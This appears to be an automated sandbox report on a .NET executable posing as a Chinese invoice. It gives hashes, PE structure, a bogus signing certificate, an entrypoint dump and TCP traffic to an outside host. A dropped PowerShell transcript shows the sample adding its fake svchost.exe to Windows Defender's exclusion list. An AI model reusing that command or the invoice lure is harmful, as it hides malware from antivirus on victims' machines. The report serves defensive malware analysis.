C:\Users\user\Documents\20210223\PowerShell_transcript.813848.SJL_vxhU.20210223153046.txt Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5905
Entropy (8bit):	5.456187185525732
Encrypted:	false
SSDEEP:	96:BZijqNEfqDo1Z0fZQjqNEfqDo1ZsYLSLgLjZRjqNEfqDo1ZnPLwLwLzrZ9S:7
MD5:	1D604BC8D0DDC87D733C0A75B0016AB9
SHA1:	8FCBEE7F59C08E35D0DC9B258592E1805D591390
SHA-256:	8FDE7DE54B1E8825F06756566CF8335650112AE653A7A72BC1C7E87B7F45717B
SHA-512:	1CB64A0C73D17C4F1C59F841E1284223181DB3B7C56C1016AA0C9DB69CC277E179E3A1826A9F7061EF30F1C86752AF56F328371CA3E4B99C7AE5F404BCE6DDE2
Malicious:	false
Preview:	.********************..Windows PowerShell transcript start..Start time: 20210223153102..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 813848 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe -Force..Process ID: 5864..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..******************..******************..Command start time: 20210223153103..******************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\tPSvrNzWhJyzOyVXyQNZLyuGqcBTk\svchost.exe -Force..********************..Windows PowerShell transcript start..Start time: 20210223153607..Usernam

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	4.356962652008706
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 50.01% Win32 Executable (generic) a (10002005/4) 49.97% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CN-Invoice-XXXXX9808-19011143287989.exe
File size:	634024
MD5:	e9cd061b2286d8098153c9d9e2ed0b4b
SHA1:	e30565df7c0597a76857532e4ca7df6d2728e7b5
SHA256:	520fae27134b14bb92d3858083c08496cee8b1c7631f0a374c5e168adfa799f2
SHA512:	6d878d2a3b9a6172196416e8cca9dc3bf0e73d0d8da2d37e343938141cc2887ee0df884f8b7cfb40f912d45c4b6a527313944dde47ed7590f0ffa54e87c54122
SSDEEP:	6144:vLt3NCnZ05Bm8yB0VwxTLZR3yO7wVLTOY2QIDOvbqhUd5H/eIS/VNnUKEAwL:D1VVW0V2ybpTOYIUWfNpa
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....}...............0.................. ........@.. ..............................0.....@................................

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x49abde
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics:	NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp:	0xF27DBEB9 [Tue Dec 2 02:51:37 2098 UTC]
TLS Callbacks:
CLR (.Net) Version:	v4.0.30319
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:	false
Signature Issuer:	C=?????????????????????????????????????????????????, S=á¨á§ºá¨ªá¨á¨á§·á¨á¨á¨á¨¡á§¼á¨á¨á§µá¨, L=â¶â¶â¶©â¶â¶âµ½â¶â¶â¶â¶³â¶â¶â¶â¶²â¶â¶£â¶â¶®â¶â¶©âµ¼â¶â¶ªâ¶¢â¶µâ¶â¶âµ¾â¶µâ¶â¶¤â¶¯â¶âµ¿â¶â¶â¶â¶â¶, T=ååå¸å´åºå®åå´åå·åå¶åå¸å·å, E=???????????????????????????????????????, OU=â®âââââ½âââºâââ·âââªâ·ââ©â¯â³â¹â¾âââ³â©ââ²â¼ââ, O=ë²³ë²´ë³ë³ë³ë³£ë³ë³ë³ë³ë³ë²²ë³ë³ë³ ë²¹ë²±, CN=ë¶ëëëëµë±ë¡ëë¥ë½ëëë¿ëëëë¯ëë´ë°ëëë¹ëë¥ë¹ë¢ëë¸ëë¢ëë¤ë³ë¡ëëëë¯
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	2/23/2021 1:43:21 AM 2/23/2022 1:43:21 AM
Subject Chain	C=?????????????????????????????????????????????????, S=á¨á§ºá¨ªá¨á¨á§·á¨á¨á¨á¨¡á§¼á¨á¨á§µá¨, L=â¶â¶â¶©â¶â¶âµ½â¶â¶â¶â¶³â¶â¶â¶â¶²â¶â¶£â¶â¶®â¶â¶©âµ¼â¶â¶ªâ¶¢â¶µâ¶â¶âµ¾â¶µâ¶â¶¤â¶¯â¶âµ¿â¶â¶â¶â¶â¶, T=ååå¸å´åºå®åå´åå·åå¶åå¸å·å, E=???????????????????????????????????????, OU=â®âââââ½âââºâââ·âââªâ·ââ©â¯â³â¹â¾âââ³â©ââ²â¼ââ, O=ë²³ë²´ë³ë³ë³ë³£ë³ë³ë³ë³ë³ë²²ë³ë³ë³ ë²¹ë²±, CN=ë¶ëëëëµë±ë¡ëë¥ë½ëëë¿ëëëë¯ëë´ë°ëëë¹ëë¥ë¹ë¢ëë¸ëë¢ëë¤ë³ë¡ëëëë¯
Version:	3
Thumbprint MD5:	1B045FD5805BDB47ABBD5FE0A70F6768
Thumbprint SHA-1:	D41A01D01D11B3718ED7010D5436E3C9D78F2F27
Thumbprint SHA-256:	4B5BCDDAB23B84E36F11C395653121696D55DADB4D6C07752F27B1782146C092
Serial:	0082B712181A23E355CA1B8C13A8B9877D

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9ab84	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9c000	0x3e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x99400	0x18a8
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x9e000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x98be4	0x98c00	False	0.352417591551	data	4.30688384543	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc	0x9c000	0x3e0	0x400	False	0.46875	data	3.55517611534	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x9e000	0xc	0x200	False	0.044921875	data	0.101910425663	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_VERSION	0x9c058	0x388	data	English	United States

Imports

DLL	Import
mscoree.dll	_CorExeMain

Version Infos

Description	Data
LegalCopyright	Copyright 2022 GHNOsowI. All rights reserved.
Assembly Version	0.2.3.8
InternalName	SKPwSvas.exe
FileVersion	1.5.5.5
CompanyName	WFGMSaGe
LegalTrademarks	EUIXPDQH
Comments	QzbmVavB
ProductName	SKPwSvas
ProductVersion	0.2.3.8
FileDescription	ZJpSDQez
OriginalFilename	SKPwSvas.exe
Translation	0x0409 0x0514

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 23, 2021 15:30:32.282521963 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.336056948 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.336218119 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.337270021 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.390383005 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676027060 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676055908 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676100969 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676121950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676139116 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676156044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676172972 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676193953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676212072 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676224947 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.676261902 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.676305056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.677155018 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.677371979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.677469969 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.678448915 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.678472042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.678559065 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.679692984 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.679749012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.679862022 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.680931091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.680963993 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.681045055 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.682174921 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.682245970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.682333946 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.683408976 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.683430910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.683523893 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.684672117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.684791088 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.684873104 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.685898066 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.685919046 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.686021090 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.687134027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.687154055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.687249899 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.688375950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.688395977 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.688507080 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.729553938 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.729583025 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.729711056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.730098963 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.730118036 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.730266094 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.731323957 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.731343985 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.731465101 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.732566118 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.732584953 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.732688904 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.733819962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.733841896 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.733946085 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.735054970 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.735704899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.735764980 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.735855103 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.736978054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.736998081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.737104893 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.738234043 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.738269091 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.738328934 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.739430904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.739465952 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.739514112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.740684986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.740720034 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.740776062 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.741940975 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.741972923 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.742038012 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.743177891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.743213892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.743323088 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.744431973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.744498968 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.744569063 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.745644093 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.745678902 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.745762110 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.746877909 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.746908903 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.746959925 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.748128891 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.748161077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.748222113 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.749406099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.749979973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.750006914 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.750071049 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.750114918 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.751280069 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.751311064 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.751465082 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.752490997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.752526999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.752651930 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.753746986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.753779888 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.753870964 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.754992962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.755021095 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.755108118 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.756354094 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.756397009 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.756494999 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.757565022 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.757602930 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.757699013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.784483910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.784540892 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.784688950 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.784965038 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.785010099 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.785099983 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.786166906 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.786336899 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.787377119 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.787424088 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.787484884 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.787539005 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.788582087 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.790298939 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.790344000 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.790431976 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.790771961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.790815115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.790855885 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.792021990 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.792073965 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.792109013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.794547081 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.794591904 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.794681072 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.795582056 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.795627117 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.795655966 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.797228098 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.797274113 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.797353983 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.798363924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.798408031 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.798455000 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.799042940 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.799087048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.799115896 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.800373077 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.800420046 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.800509930 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.801454067 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.801476955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.801528931 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.803217888 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.803261042 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.803348064 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.803828955 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.803900003 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.804749012 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.804779053 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.804872036 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.805664062 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.805682898 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.805759907 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.806850910 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.806873083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.806962013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.808048010 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.808067083 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.808135033 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.809170961 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.809192896 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.809262037 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.810266972 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.810286999 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.810385942 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.811326027 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.811346054 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.811418056 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.812366962 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.812385082 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.812449932 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.837858915 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.837882996 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.837996960 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.838129044 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.838149071 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.838233948 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.840538979 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.840563059 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.840718031 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.840883017 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.840900898 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.840959072 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.843442917 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.843461037 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.843556881 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.843839884 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.843858957 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.843955040 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:32.845082045 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:32.845101118 CET	80	49737	172.67.172.17	192.168.2.4
